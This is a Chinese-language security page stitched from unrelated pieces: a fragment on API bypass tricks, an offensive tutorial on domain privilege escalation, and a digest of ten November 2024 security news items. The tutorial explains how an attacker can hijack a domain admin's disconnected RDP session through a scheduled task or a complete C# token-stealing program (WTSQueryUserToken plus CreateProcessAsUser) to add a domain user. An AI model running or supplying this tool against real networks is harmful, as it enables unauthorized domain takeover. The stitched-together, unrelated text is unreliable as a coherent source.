这些尝试本质也是在破坏数据原有结构，利用后端，服务器等处理特性实现绕过。 其实除此外还可以进行任何可能的尝试：https://www.example.com/api/v1/users 例如将v1改成v2，利用通配符代替数字，或者添加多余的字符串等等操作。

前言 当域内管理员登录过攻击者可控的域内普通机器运维或者排查结束后，退出3389时没有退出账号而是直接关掉了远程桌面，那么会产生哪些风险呢？有些读者第一个想到的肯定就是抓密码，但是如果抓不到明文密码又或者无法pth呢？ 通过计划任务完成域内提权 首先模拟域管登录了攻击者可控的普通域内机器并且关掉了3389远程桌面： 然后攻击者可以通过如下方式进行域内提权，已添加域内用户为例，流程为新建计划任务-选择域管用户-执行命令： 选择搜索用户位置为域内： 选择登录进来的域管用户： 设置启动的命令： 然后运行计划任务，可以看到成功添加了域内用户： 有些读者可能会问了，那是不是选择任意域内用户都行，实际上是不行的，会提示用户未登录： 原理分析 原理实际上也很简单，就是获取进程的token，然后利用CreateProcessAsUser api完成模拟用户token进行进程创建即可。下面提供完整代码,如下代码核心是利用WTSQueryUserToken获取rdp session id token，然后使用CreateProcessAsUser完成进程的创建： using System; using System.Runtime.InteropServices; using System.ComponentModel; using System.Security.Principal; class Program {   [DllImport("wtsapi32.dll", SetLastError = true)]   static extern bool WTSQueryUserToken(int sessionId, out IntPtr Token);   [DllImport("kernel32.dll", SetLastError = true)]   static extern bool CloseHandle(IntPtr hObject);   [DllImport("userenv.dll", SetLastError = true)]   static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);   [DllImport("userenv.dll", SetLastError = true)]   static extern bool DestroyEnvironmentBlock(IntPtr lpEnvironment);   [DllImport("advapi32.dll", SetLastError = true)]   static extern bool CreateProcessAsUser(       IntPtr hToken,       string lpApplicationName,       string lpCommandLine,       IntPtr lpProcessAttributes,       IntPtr lpThreadAttributes,       bool bInheritHandles,       uint dwCreationFlags,       IntPtr lpEnvironment,       string lpCurrentDirectory,       ref STARTUPINFO lpStartupInfo,       out PROCESS_INFORMATION lpProcessInformation);   [StructLayout(LayoutKind.Sequential)]   struct STARTUPINFO   {       public int cb;       public string lpReserved;       public string lpDesktop;       public string lpTitle;       public uint dwX;       public uint dwY;       public uint dwXSize;       public uint dwYSize;       public uint dwXCountChars;       public uint dwYCountChars;       public uint dwFillAttribute;       public uint dwFlags;       public short wShowWindow;       public short cbReserved2;       public IntPtr lpReserved2;       public IntPtr hStdInput;       public IntPtr hStdOutput;       public IntPtr hStdError;   }   [StructLayout(LayoutKind.Sequential)]   struct PROCESS_INFORMATION   {       public IntPtr hProcess;       public IntPtr hThread;       public uint dwProcessId;       public uint dwThreadId;   }   static void Main(string[] args)   {       if (args.Length < 2)       {           Console.WriteLine("Usage: RdpProcessLauncher.exe <sessionId> <command>");           return;       }       int sessionId;       if (!int.TryParse(args[0], out sessionId))       {           Console.WriteLine("Invalid session ID");           return;       }       string command = args[1];       IntPtr userToken = IntPtr.Zero;       IntPtr envBlock = IntPtr.Zero;       try       {           // Get user token for the specified session           bool tokenResult = WTSQueryUserToken(sessionId, out userToken);           if (!tokenResult)           {               int error = Marshal.GetLastWin32Error();               throw new Win32Exception(error);           }           // Create environment block           bool envResult = CreateEnvironmentBlock(out envBlock, userToken, false);           if (!envResult)           {               int error = Marshal.GetLastWin32Error();               throw new Win32Exception(error);           }           // Prepare startup info           STARTUPINFO startupInfo = new STARTUPINFO();           startupInfo.cb = Marshal.SizeOf(startupInfo);           startupInfo.lpDesktop = "winsta0\\default";           PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();           // Create process as user           bool processResult = CreateProcessAsUser(               userToken,               null,               command,               IntPtr.Zero,               IntPtr.Zero,               false,               0x00000400, // CREATE_UNICODE_ENVIRONMENT               envBlock,               null,               ref startupInfo,               out processInfo);           if (!processResult)           {               int error = Marshal.GetLastWin32Error();               throw new Win32Exception(error);           }           Console.WriteLine("Process launched successfully. PID: {0}", processInfo.dwProcessId);           // Clean up process handles           CloseHandle(processInfo.hProcess);           CloseHandle(processInfo.hThread);       }       catch (Exception ex)       {           Console.WriteLine("Error: {0}", ex.Message);       }       finally       {           // Clean up resources           if (envBlock != IntPtr.Zero)           {               DestroyEnvironmentBlock(envBlock);           }           if (userToken != IntPtr.Zero)           {               CloseHandle(userToken);           }       }   } } 编译后进行尝试： 成功完成了token窃取并添加了域内用户。 总结 本文通过演示窃取RDP Session Token完成域内提权的目的。

1、研华工业级 Wi-Fi设备存在多个严重漏洞 https://thehackernews.com/2024/11/over-two-dozen-flaws-identified-in.html 网络安全公司Nozomi Networks在周三的分析中表示：“这些漏洞带来了重大风险，允许未经身份验证的远程代码以root权限执行，从而完全损害受影响设备的机密性、完整性和可用性。” 2、研究人员发现第一个针对Linux的UEFI Bootkit-Bootkitty https://thehackernews.com/2024/11/researchers-discover-bootkitty-first.html 网络安全研究人员揭示了第一个专为 Linux 系统设计的统一可扩展固件接口 (UEFI) bootkit 。该Bootkit被其名为 BlackCat 的创建者称为Bootkitty ，被评估为概念验证 (PoC)，并且没有证据表明它已被用于现实世界的攻击。它也被追踪为IranuKit ，于2024年11月5日上传到VirusTotal平台。 3、黑客利用流行的Godot游戏引擎传播恶意软件 https://research.checkpoint.com/2024/gaming-engines-an-undetected-playground-for-malware-loaders/ Check Point Research揭示了一个新型的恶意软件加载技术，利用开源游戏引擎Godot执行恶意GDScript代码，从而触发恶意命令并加载恶意软件。该技术已成功避开几乎所有杀毒引擎，感染了超过17000台计算机。恶意加载器GodLoader自2024年6月29日起被网络犯罪分子广泛传播，主要通过GitHub的Stargazers Ghost Network分发。该网络采用了“恶意软件即 4、攻击者利用ProjectSend漏洞攻击暴露的服务器 https://vulncheck.com/blog/projectsend-exploited-itw 2024年11月，黑客利用ProjectSend中的认证绕过漏洞（CVE-2024-11680）攻击暴露的服务器，上传webshell并获得远程控制权限。该漏洞影响所有未升级至r1720版本的ProjectSend，攻击者可以通过发送特制的HTTP请求到'options.php'，修改应用配置，成功利用后可创建恶意账户、植入webshell和嵌入恶意JavaScript代码。Censys报告显示，约4000个公开暴露的ProjectSend实例中，大多数仍然存在漏洞，55%的实例运行的是 5、名为Matrix的黑客操控大量IoT僵尸网络发动DDoS攻击 https://hackread.com/matrix-hackers-new-iot-botnet-ddos-attacks/ Aqua Nautilus的研究人员揭示了由名为Matrix的黑客组织发动的一次大规模分布式拒绝服务（DDoS）攻击活动。Matrix被认为是一个低技术门槛的威胁行为者，主要通过暴力破解、利用默认弱密码和设备配置漏洞，感染了大量的IoT设备，包括摄像头、路由器、DVR和企业系统。这些被感染的设备被用来组建一个庞大的僵尸网络，攻击目标主要集中在Layer 4（传输层）和Layer 7（应用层），并通过Telegram机器人“Kraken Autobuy”提供DDoS 6、Cloudflare发生一起影响大量客户的日志丢失事件 https://blog.cloudflare.com/cloudflare-incident-on-november-14-2024-resulting-in-lost-logs/ Cloudflare发生了一起影响大量客户的日志丢失事件，导致约55%的日志未能成功发送。在大约3.5小时的时间内，Cloudflare的日志服务遭遇了系统故障，导致大部分客户的事件日志未能传输。事后调查显示，问题源自一次配置错误，这个错误触发了后续的系统过载，尤其是在日志转发服务（Logfwdr）和日志缓冲系统（Buftee）之间的配合问题。具体来说，Logfwdr的错误配置导致所有客户的日志都被错误地转发， 7、朝鲜黑客利用武器化的 JavaScript 项目攻击开发人员 https://cybersecuritynews.com/weaponized-javascript-projects/ 朝鲜威胁行为者利用武器化的 Javascript 项目瞄准软件开发人员，其中包括通过 NPM 软件包部署的 BeaverTail 恶意软件。它的目的是窃取信息并加载其他阶段的恶意软件，特别是名为 InvisibleFerret 的基于 Python 的多阶段后门。 8、新的 Skimmer 恶意软件从结账页面窃取信用卡数据 https://cybersecuritynews.com/skimmer-malware-credit-card-theft/ 一种新的 skimmer 恶意软件针对 Magento 支持的电子商务网站，从结帐页面窃取敏感的信用卡信息。该恶意软件动态创建虚假信用卡表单或直接提取付款字段，仅在结帐页面上激活。随后，被盗信息被加密并过滤到远程服务器。 9、HPE Insight 远程支持漏洞可让攻击者执行任意代码 https://cybersecuritynews.com/hpe-insight-remote-support-vulnerabilities/ Hewlett Packard Enterprise (HPE) 披露了其 Insight Remote Support (IRS) 软件中的多个高严重性漏洞，可能允许攻击者执行远程代码、执行目录遍历和访问敏感信息。该安全公告于 2024 年 11 月 22 日发布，敦促用户立即采取行动解决这些严重缺陷。 10、Zabbix SQL注入漏洞可让攻击者获得对实例的完全控制 https://cybersecuritynews.com/zabbix-sql-injection-vulnerability/ 流行的开源监控解决方案 Zabbix 中发现了一个严重的安全漏洞，可能使攻击者能够完全控制受影响的实例。该漏洞编号为 CVE-2024-42327，影响 Zabbix 的多个版本，CVSS 评分为 9.9，表明其严重性。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。